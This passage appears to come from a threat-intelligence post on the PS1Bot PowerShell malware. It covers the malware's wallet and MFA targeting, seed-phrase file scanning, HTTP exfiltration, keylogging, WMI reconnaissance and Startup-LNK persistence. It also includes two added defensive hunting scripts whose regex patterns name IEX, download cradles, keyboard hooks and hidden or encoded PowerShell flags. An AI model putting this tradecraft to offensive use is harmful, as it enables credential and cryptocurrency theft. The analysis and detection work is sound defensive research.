SushiSwap
kepler-edge
Harmoney
Uniswap
okx-wallet
Nami
1inch
unisat-wallet
MartianAptos
petra-aptos-wallet
xdefi-wallet
Braavos
manta-wallet
rose-wallet
XDEFI
TON
Authenticator
Yoroi
Tron
If discovered, associated extension data is staged using a process similar to that described earlier for web browser application data. The information stealer also attempts to locate locally installed cryptocurrency wallet applications and MFA applications, including the following:
Authy Desktop
Atomic
Armory
Exodus
Electrum
Bytecoin
Coinomi
Daedalus
Ethereum
Bitcoin Core
Ledger Live
Guarda
Binance
Zcash
TrustWallet
One interesting piece of functionality included with the information stealer is a scanner that is designed to identify and exfiltrate files containing sensitive information. The script contains a large wordlist of English words. We have also observed variants of the grabber module that contain wordlists targeting other languages, such as Czech. Additionally, we have observed versions that contain multiple wordlists targeting different cryptocurrency wallet seed phrase combinations.
Figure 9. Wallet seed phrase wordlist.
This wordlist is designed to be used to identify files that may contain cryptocurrency wallet seed phrases, which can be used to regain access to wallets in the case that the primary authentication method is unavailable. This is performed by iterating through the file system on local hard drives, identifying files matching specific file extensions and file sizes, and then scanning them for the presence of multiple string values matching the wordlist.
Figure 10. File scanning parameters.
It also attempts to identify files that may contain passwords.
Figure 11. Password file detection criteria.
Once the sensitive information has been collected, it is then compressed and exfiltrated to the attacker’s C2 server.
Figure 12. Compressed archive exfiltration logic.
Data compression and exfiltration are performed via an HTTP POST request, as shown in Figure 13.
Figure 13. Example HTTP POST containing compressed archive.
Any discovered wallet seed phrases are communicated to the attacker using HTTP GET requests, using a format similar to the one in Figure 14.
Figure 14. Transmission of detected wallet seed phrase contents.
This demonstrates a robust information stealer that, in this case, has been implemented as a PowerShell module.
Keylogger
The keylogging and clipboard capture module is implemented similarly to the screen capture module described earlier, with PowerShell being used to dynamically compile and execute a C# assembly DLL at runtime.
Figure 15. Example use of Add-Type in PowerShell.
The keylogger uses SetWindowsHookEx() to monitor keyboard and mouse events to facilitate the capture of keystrokes and mouse activity on the system.
Figure 16. Example SetWindowsHookEx() logic.
Clipboard contents are also monitored so that information copied can be dynamically logged as well. As with other modules, status logging has been implemented and is performed via HTTP GET requests, an example of which is:
The module also relays this status in the body of an HTTP POST request.
Figure 17. Status logging transmission to C2.
Collected data is transmitted to the attacker via HTTP POST requests similar to Figure 18.
Figure 18. Keystroke log transmission.
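The antivirus, screen capture and keylogger modules described above share three host-side behaviors that are visible to defenders with PowerShell ScriptBlock logging enabled: C2 response content passed to IEX, C# compiled at runtime with Add-Type, and a keyboard hook installed with SetWindowsHookEx(). The following hunting script is an added example written for this post, not code from Talos or from the malware; it reads Event ID 4104 entries from the Microsoft-Windows-PowerShell/Operational log and reports script blocks that combine two or more of these indicators. The indicator names and regular expressions are this example's own choices and assume the script is run with read access to that log.

```powershell
# Added hunting example (not Talos code). Requires PowerShell ScriptBlock logging
# (Event ID 4104) to be enabled on the host being examined.

# Indicator patterns. The labels are descriptive names chosen for this example;
# the patterns cover the behaviors described in the post, not a specific sample.
$script:PS1BotIndicators = @{
    'InvokeExpression'     = '(?i)\b(iex|Invoke-Expression)\b'
    'WebFetch'             = '(?i)Invoke-WebRequest|Invoke-RestMethod|DownloadString|Net\.WebClient'
    'RuntimeCSharpCompile' = '(?i)Add-Type\s+[^\r\n]*-TypeDefinition'
    'KeyboardHook'         = '(?i)SetWindowsHookEx'
    'ScreenCaptureApi'     = '(?i)CopyFromScreen|BitBlt'
    'ClipboardAccess'      = '(?i)Get-Clipboard|Clipboard\]::GetText|AddClipboardFormatListener'
}

# Returns the names of all indicators present in a block of PowerShell text.
function Test-PS1BotLikeScript {
    param([Parameter(Mandatory)][string]$ScriptText)
    foreach ($name in $script:PS1BotIndicators.Keys) {
        if ($ScriptText -match $script:PS1BotIndicators[$name]) { $name }
    }
}

# Reads 4104 events and returns those whose script block matches at least
# $MinimumIndicators distinct patterns (two by default, to limit noise from
# legitimate Add-Type or Invoke-WebRequest use in administrative scripts).
function Get-PS1BotLikeScriptBlocks {
    [CmdletBinding()]
    param(
        [int]$MaxEvents = 5000,
        [int]$MinimumIndicators = 2,
        [string]$ComputerName = $env:COMPUTERNAME
    )

    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    $events = Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter `
                           -MaxEvents $MaxEvents -ErrorAction Stop

    foreach ($evt in $events) {
        # EventData for 4104 carries ScriptBlockText, ScriptBlockId and Path.
        $xml  = [xml]$evt.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $text = $data['ScriptBlockText']
        if (-not $text) { continue }

        $hits = @(Test-PS1BotLikeScript -ScriptText $text)
        if ($hits.Count -ge $MinimumIndicators) {
            [pscustomobject]@{
                TimeCreated   = $evt.TimeCreated
                ScriptBlockId = $data['ScriptBlockId']
                Path          = $data['Path']          # empty when run from memory, as with IEX
                Indicators    = ($hits -join ',')
                Preview       = $text.Substring(0, [Math]::Min(200, $text.Length))
            }
        }
    }
}

Get-PS1BotLikeScriptBlocks | Sort-Object TimeCreated | Format-Table -AutoSize
```

An empty Path value combined with InvokeExpression and WebFetch hits is the shape to expect from the beaconing loop, since the delivered modules never touch disk before execution; a block that also contains RuntimeCSharpCompile with KeyboardHook or ScreenCaptureApi matches the keylogger and screen capture modules respectively. Long script blocks are split across several 4104 events with the same ScriptBlockId, so correlate on that field rather than treating each event in isolation.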
Information collection
We have also observed the delivery of a system survey module that the attacker refers to as “WMIComputerCSHARP” that is used to collect and transmit information about the infected system and environment to the attacker. Consistent with the design of the screenshot and keylogging modules, this module is implemented using a combination of PowerShell and C# and features the use of runtime compilation.
The module uses WMI to query the domain membership information of the infected system, likely to enable the attacker to perform reconnaissance and determine whether they were successful in gaining access to a high-value target.
Figure 19. Survey collection status logging message.
The following WMI queries are performed as part of this process:
SELECT Domain, PartOfDomain FROM Win32_ComputerSystem
SELECT DomainName FROM Win32_NTDomain WHERE ClientSiteName IS NOT NULL
The %USERDNSDOMAIN% environment variable is also queried in an attempt to enumerate the domain membership of the infected system. The collected information is transmitted to the attacker's C2 server, consistent with what was described for other modules.
Figure 20. Example status logging implementation.
Persistence
We have also observed the delivery of a persistence module that can be used as desired to ensure that the main looping mechanism is re-executed following a system restart or user session termination. This allows for the reestablishment of a C2 communications channel and enables the delivery of additional modules as desired by the adversary.
The module begins by attempting to create a PowerShell script that will be executed each time the system restarts. The module creates a randomly generated directory within the %PROGRAMDATA% directory that will be used to store the components needed for persistence. These include a randomly-named PowerShell script (PS1) as well as a randomly-named shortcut file (ICO). A malicious randomly-named LNK file is also created in the Startup directory that is configured to point to the PowerShell script previously created so that it can be executed each time the system is rebooted.
The ICO file is created using base64-encoded content delivered as part of the module itself. The PowerShell script contents are generated by retrieving an obfuscated blob from the C2 server, which in our sample was hosted at the URL path /transform.
Figure 22. Persistence payload retrieval.
A simulated example of this process is shown in Figure 23.
Figure 23. Simulated delivery of obfuscated persistence payload.
This content is then written to the PS1 file, and the LNK file is generated with the appropriate parameters to enable execution in the future. When deobfuscated, the PowerShell script simply contains the same logic used to establish the C2 polling process described earlier in the infection chain.
Figure 24. Deobfuscated persistence payload.
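The persistence layout described above (a randomly named directory under %PROGRAMDATA% holding a PS1 and an ICO file, plus an LNK file in the Startup directory that launches the script) leaves a footprint that can be hunted for directly. The script below is an added example written for this post, not Talos code; it enumerates the per-user and all-users Startup folders, resolves each shortcut's target through the WScript.Shell COM object, and flags shortcuts that launch PowerShell, reference a .ps1 file, or point their target or icon under %PROGRAMDATA%. The reason labels and the choice to treat any %PROGRAMDATA% location as noteworthy are assumptions made for this example, since the post does not describe the directory naming scheme; expect to allowlist legitimate vendor entries in your environment.

```powershell
# Added hunting example (not Talos code). Run with rights to read other users'
# profile directories; results are plain objects so they can be exported or
# compared against a baseline.

function Get-SuspiciousStartupShortcuts {
    [CmdletBinding()]
    param()

    # Current user's and all-users' Startup folders.
    $startupDirs = @(
        [Environment]::GetFolderPath('Startup'),
        [Environment]::GetFolderPath('CommonStartup')
    )
    # GetFolderPath only covers the current user, so add every profile under C:\Users.
    $startupDirs += Get-ChildItem -Path 'C:\Users' -Directory -ErrorAction SilentlyContinue |
        ForEach-Object {
            Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
        }

    $shell = New-Object -ComObject WScript.Shell
    # Regex-escaped %PROGRAMDATA% path, e.g. C:\\ProgramData
    $programDataPattern = '(?i)' + [regex]::Escape($env:ProgramData) + '\\'

    foreach ($dir in ($startupDirs | Sort-Object -Unique)) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }

        foreach ($lnk in Get-ChildItem -LiteralPath $dir -Filter '*.lnk' -File -ErrorAction SilentlyContinue) {
            $sc        = $shell.CreateShortcut($lnk.FullName)
            $target    = $sc.TargetPath
            $argString = $sc.Arguments
            $icon      = $sc.IconLocation
            $cmd       = "$target $argString"

            $reasons = @()
            if ($cmd -match '(?i)\b(powershell|pwsh)(\.exe)?\b')  { $reasons += 'LaunchesPowerShell' }
            if ($cmd -match '(?i)\.ps1\b')                         { $reasons += 'ReferencesPs1' }
            if ($cmd -match $programDataPattern)                   { $reasons += 'TargetUnderProgramData' }
            if ($icon -match $programDataPattern -and $icon -match '(?i)\.ico') {
                $reasons += 'IconUnderProgramData'      # matches the dropped ICO described above
            }
            # Flags commonly used to run a script silently from a shortcut.
            if ($cmd -match '(?i)-(w|win|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass|-(e|enc|encodedcommand)\b') {
                $reasons += 'QuietPowerShellFlags'
            }

            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    Shortcut     = $lnk.FullName
                    Created      = $lnk.CreationTime
                    Target       = $target
                    Arguments    = $argString
                    IconLocation = $icon
                    Reasons      = ($reasons -join ',')
                }
            }
        }
    }
}

Get-SuspiciousStartupShortcuts | Format-Table -AutoSize
```

A hit carrying LaunchesPowerShell, ReferencesPs1 and TargetUnderProgramData together reproduces the structure in the post; the creation timestamp of the LNK and the contents of the referenced directory give the next pivot, and the PS1 itself can then be deobfuscated and compared against the C2 polling logic in Figure 24.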
We assess with high confidence that additional modules are likely available for deployment as needed by the adversary, and that this framework provides a flexible means to rapidly enhance and extend the available functionality.
Links to previous intrusion activity
During our analysis of the code and functionality associated with this infection chain, we observed similarities with components referenced in prior reporting related to the use of Skitnet/Bossnet to deliver PowerShell modules to infected systems. We have also observed multiple overlaps in the C2 infrastructure used in this campaign and the one described by the aforementioned reporting. Additionally, we assess with high confidence that the final deobfuscated payload dropped by the persistence module previously described was likely created by the same entity who created the PowerShell script described in the prior reporting. The overall implementation, use of specific variables throughout the code, and matching C2 URL construction strengthen this assessment. Below is a comparison of the code in both instances.
Figure 25. Comparison of persistence payload (left) vs. ProDaft reporting (right).
As shown in Figure 25, the only difference between the two samples is the addition of mutex handling and sleep periods.
While Talos did not identify any direct overlap in activity related to these malware families, we noted similarities in the design architecture and functionality provided by the PS1Bot malware delivered in this case and that present in another malware family Talos previously reported on called AHK Bot. The derivation of the C2 URL path based on the drive serial number is consistent across both malware families. Likewise, the use of a main polling script and subsequent delivery and execution of purpose-built modules is also similar to the design architecture found with AHK Bot. There are also several similarities in the types of modules available for both malware families. Heavy use of URL parameters when communicating with C2 is another similarity between the two families.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent and secure access to the internet, cloud services or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort SIDs for the threats are:
Snort2: 65231 – 65233
Snort3: 65231 – 65233
ClamAV detections are also available for this threat:
Win.Backdoor.PS1Bot-10056514-0
Win.Backdoor.PS1Bot-10056515-0
Win.Backdoor.PS1Bot-10056516-0
Win.Backdoor.PS1Bot-10056517-0
Win.Backdoor.PS1Bot-10056518-0
Win.Backdoor.PS1Bot-10056519-0
Win.Backdoor.PS1Bot-10056520-0
Win.Backdoor.PS1Bot-10056521-0
Win.Backdoor.PS1Bot-10056522-0
Win.Backdoor.PS1Bot-10056523-0
Win.Backdoor.PS1Bot-10056524-0
Win.Backdoor.PS1Bot-10056525-0
Win.Backdoor.PS1Bot-10056526-0
Win.Backdoor.PS1Bot-10056527-0
Win.Backdoor.PS1Bot-10056528-0
Win.Backdoor.PS1Bot-10056529-0
Win.Backdoor.PS1Bot-10056530-0
Win.Backdoor.PS1Bot-10056531-0
Win.Backdoor.PS1Bot-10056532-0
Win.Backdoor.PS1Bot-10056533-0
Win.Backdoor.PS1Bot-10056534-0
Win.Backdoor.PS1Bot-10056535-0
Win.Backdoor.PS1Bot-10056536-0
Win.Backdoor.PS1Bot-10056537-0
Win.Backdoor.PS1Bot-10056538-0
Win.Backdoor.PS1Bot-10056539-0
Win.Backdoor.PS1Bot-10056540-0
Win.Backdoor.PS1Bot-10056541-0
Win.Backdoor.PS1Bot-10056542-0
Indicators of compromise (IOCs)
IOCs for this threat can be found in our GitHub repository here.